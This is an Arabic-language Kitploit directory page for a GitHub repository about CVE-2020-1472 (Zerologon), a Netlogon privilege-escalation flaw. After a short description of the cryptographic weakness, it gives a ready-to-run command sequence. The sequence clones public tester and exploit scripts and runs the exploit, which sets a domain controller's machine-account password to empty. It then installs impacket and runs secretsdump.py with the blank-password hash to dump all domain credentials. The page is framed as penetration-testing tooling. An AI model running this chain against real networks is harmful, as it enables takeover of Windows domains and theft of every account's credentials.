Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-1472 — [CVE-2020-1472] تصعيد الامتياز لبروتوكول Netlogon عن بُعد (MS-NRPC) (Zerologon) | Kitploit
أدوات/GitHubGitHub/murataydemir/cve-2020-1472
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] تصعيد الامتياز لبروتوكول Netlogon عن بُعد (MS-NRPC) (Zerologon)

عرض المستودع
123منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[CVE-2020-1472] تصعيد الامتيازات عبر بروتوكول Netlogon عن بُعد (MS-NRPC) (Zerologon)

يستغل الهجوم الموضح هنا ثغرات في بروتوكول المصادقة التشفيري (الاستخدام غير الآمن لـ AES-CFB8) الذي يُثبت صحة وهوية جهاز مرتبط بالمجال إلى وحدة تحكم المجال (DC). بسبب الاستخدام غير الصحيح لوضع تشغيل AES، من الممكن تزوير هوية أي حساب جهاز (بما في ذلك حساب DC نفسه) وتعيين كلمة مرور فارغة (ببساطة عن طريق إرسال عدد من رسائل Netlogon حيث يتم ملء الحقول المختلفة بالأصفار) لذلك الحساب في المجال. يمكن بعد ذلك استخدام هذا للحصول على بيانات اعتماد مسؤول المجال ثم استعادة كلمة مرور DC الأصلية.

من أجل التحقق من CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (مثال: ./zerologon_tester.py DC01 172.16.208.161)

من أجل استغلال CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (مثال: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

ثم، قم بتشغيل أحد الأوامر التالية

مثال الصيغة 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
مثال الصيغة 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

صورة للإثبات

المقال الأصلي متاح هنا
المستودع الأصلي الذي يحتوي على نص اختبار بايثون متاح هنا
المستودع الأصلي الذي يحتوي على نص استغلال بايثون متاح هنا

تنزيل الأداة